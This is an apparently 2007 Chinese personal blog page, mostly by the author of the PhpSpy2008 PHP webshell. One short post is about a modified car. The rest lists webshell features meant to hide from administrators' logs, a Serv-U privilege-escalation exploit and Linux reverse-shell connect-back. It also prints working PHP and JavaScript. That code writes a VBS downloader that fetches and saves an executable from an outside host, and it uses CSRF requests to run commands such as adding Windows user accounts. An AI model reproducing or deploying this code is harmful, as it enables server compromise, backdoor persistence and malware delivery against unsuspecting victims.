登陆
浏览模式: 标准 | 列表 2007年12月的文章

广西第一改装EVO

我好兄弟小海的车。500匹马力,比宝马M6还快,4秒0-100,到了180还有推倍感。和国内最快的evo也差不了多少。和我们几辆车在荔浦到桂林的路上。大家都开到170了。这辆EVO硬是从旁边呼啸而过。超哪辆车车那辆就要刹车。

下面来看看一段短短的视频,看到刹车灯的时候。速度已经达到150了。

» 阅读全文

Tags: evo, 改装

PhpSpy2008更新记录

按回忆记述吧,phpspy从2006到2008,其中还有一个未公开的2007,不过2007已经不存在了。我就是从2007改过来的,已经没有2007的文件了。

  1. 加强cookie功能,以确保能百分百登陆。
  2. 改成全英文版并根据数据库的编码设置声明相应的页面编码,以确保各编码服务器能正常输出。
  3. 加强文件管理功能,增加批量删除文件。增加新的文件属性显示方式和宿主。增加目录改名。增加查看网站根目录和当前目录下的所有可写子目录。在WIN主机下自动探测所有分区以及分区类型。
  4. 增加通过MYSQL方式上传下载文件,其中下载文件不需要数据库用户具有FILE权限。即可完整下载。程序自动判断两种方式下载。上传需要具有FILE权限。
  5. 加强MYSQL数据库管理功能,增加查询回显并带分页显示,增加插入、修改、删除记录。增加查看表结构和常用信息、删除表功能。并支持多句同时运行。
  6. 增加执行PHP代码功能,并附加一些有用的PHP代码。例如Serv-U本地提权利用代码,适用于6.4以及一下版本。
  7. 增强执行命令功能。
  8. 简化一些PHP环境变量显示。
  9. 大大提高各个操作的效率,尤其是文件管理。加快多文件目录的输出速度。
  10. 基本全部改为POST方式提交数据和跳转。大大的增加了隐蔽性。防止管理员查看日志找出端倪。
  11. 增加linux主机端口反弹功能。使用PERL和C 双重实现。
  12. ……

更多更新请关注本博客和www.4ngel.net

Tags: phpspy, 更新

AJAX在安全方面的应用

本来想给小黑群里的人开个玩笑。谁知道经过小黑的csrf实例后,大家都先看代码了。这下我明白了。小黑用过的招数都不能再用了。再用就不灵了。因为小黑太黑,让人印象深刻。

还是记录一下吧,ajax真的是隐秘性很高。我是这样来利用的。比较彻底。

PHP代码
  1. elseif ($doing == 'writevbs') {   
  2.     $fp = @fopen('c:/angel.vbs','w');   
  3.     $vbs = "Set love = CreateObject(\"Microsoft.XMLHTTP\")\n".   
  4.         "love.Open \"GET\",\"http://www.4ngel.net/1.exe\",0\n".   
  5.         "love.Send()\n".   
  6.         "Set you = CreateObject(\"ADODB.Stream\")\n".   
  7.         "you.Mode = 3\n".   
  8.         "you.Type = 1\n".   
  9.         "you.Open()\n".   
  10.         "you.Write(love.responseBody)\n".   
  11.         "you.SaveToFile \"c:\\1.exe\",2";   
  12.     @fwrite($fp,$vbs);   
  13.     @fclose($fp);   
  14. }  

加了一段代码是生成一个VBS脚本。这段脚本的作用从4ngel.net上下载一个1.exe文件保存到他本地的1.exe,然后有一段是AJAX的功能代码。

JavaScript代码
  1. <script type="text/javascript">   
  2. var http_request = false;   
  3. function makeRequest(url, httpType, sendData) {   
  4.     http_request = false;   
  5.     if (!httpType) httpType = "GET";   
  6.   
  7.     if (window.XMLHttpRequest) { // Non-IE...   
  8.         http_request = new XMLHttpRequest();   
  9.         if (http_request.overrideMimeType) {   
  10.             http_request.overrideMimeType('text/plain');   
  11.         }   
  12.     } else if (window.ActiveXObject) { // IE   
  13.         try {   
  14.             http_request = new ActiveXObject("Msxml2.XMLHTTP");   
  15.         } catch (e) {   
  16.             try {   
  17.                 http_request = new ActiveXObject("Microsoft.XMLHTTP");   
  18.             } catch (e) {}   
  19.         }   
  20.     }   
  21.   
  22.     if (!http_request) {   
  23.         alert('Cannot send an XMLHTTP request');   
  24.         return false;   
  25.     }   
  26.   
  27.     http_request.open(httpType, url, true);   
  28.     http_request.setRequestHeader('Content-Type''application/x-www-form-urlencoded');   
  29.     http_request.send(sendData);   
  30. }   
  31. //makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');   
  32. //makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\angel.vbs');   
  33. //makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\1.exe');   
  34. makeRequest('<?=$self?>''POST''action=shell&execfunc=system&command=net user angel angel /add');   
  35. makeRequest('<?=$self?>''POST''action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');   
  36. </script>  

最后几句是以POST方式请求本地测试环境中的phpspy2008,调用命令执行功能,生成vbs,然后执行VBS。再执行下载的exe文件。不过我已经注释掉了。这样在本地测试是成功的。对待自己兄弟们不能这么心狠。所以就注释掉了。加了一个用户。

我只是想说。AJAX作为一个现在逐渐受到重视的技术,在强调增加用户体验的同时,带来的安全也是神不知鬼不觉的。因为他的请求。你根本察觉不到。更具体的应用还是要靠大家自己去领悟了。

Tags: ajax, 安全

PhpSpy2008最终形态

本来想把sevr-u和mysql的溢出集成进去的。但是考虑到体积太大不利于隐藏,所以把这些功能做成插件形式。全部把模块写好。放在http://www.4ngel.net上,需要的时候再通过执行PHP代码功能执行就可以了。phpspy2008就只有文件管理、MYSQL管理和执行命令等功能。这样可以保证体积,目前都有60K了。对于一个WEBSHELL来说。还是有点太大。如果把serv-u和mysql的溢出整合进去。都要近100K了。

phpspy2008

» 阅读全文

Tags: phpspy, 后门

被小黑吓了一把——差点被小黑加了个用户

事情起因:http://superhei.blogbus.com/logs/12289653.html

结论:以后对于小黑发的LINK一定要小心翼翼。要不然我的机器上就多了一个heige用户了。幸好我的COOKIE有问题。登陆任何论坛和博客。关闭浏览器就无效了。哪怕选了时效的。

小黑叫我看我的C盘有没有heige.txt的时候。我马上就把刚才小黑发的LINK的源代码看了一下。

JavaScript代码
  1. <script>   
  2. var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt';    
  3. getURL(url);   
  4. function getURL(s) {   
  5.     var image = new Image();   
  6.     image.style.width = 0;   
  7.     image.style.height = 0;   
  8.     image.src = s;   
  9. }   
  10. </script>  

上面的代码一看吓我一跳。因为我装的是APACHE套件的,所以服务还是SYSTEM权限运行的。如果不是我的COOKIE有问题。PHPSPY2008处于登陆状态。就被执行命令了。还好是小黑。如果是其他人狠一点的话。来一个format /q /y,那我都不知道找谁了。看来以后一定不能在网上暴露过多自己计算机的信息。

网络——危险无处不在。 

Tags: csrf, xss, 攻击, phpspy

Total:812Next ›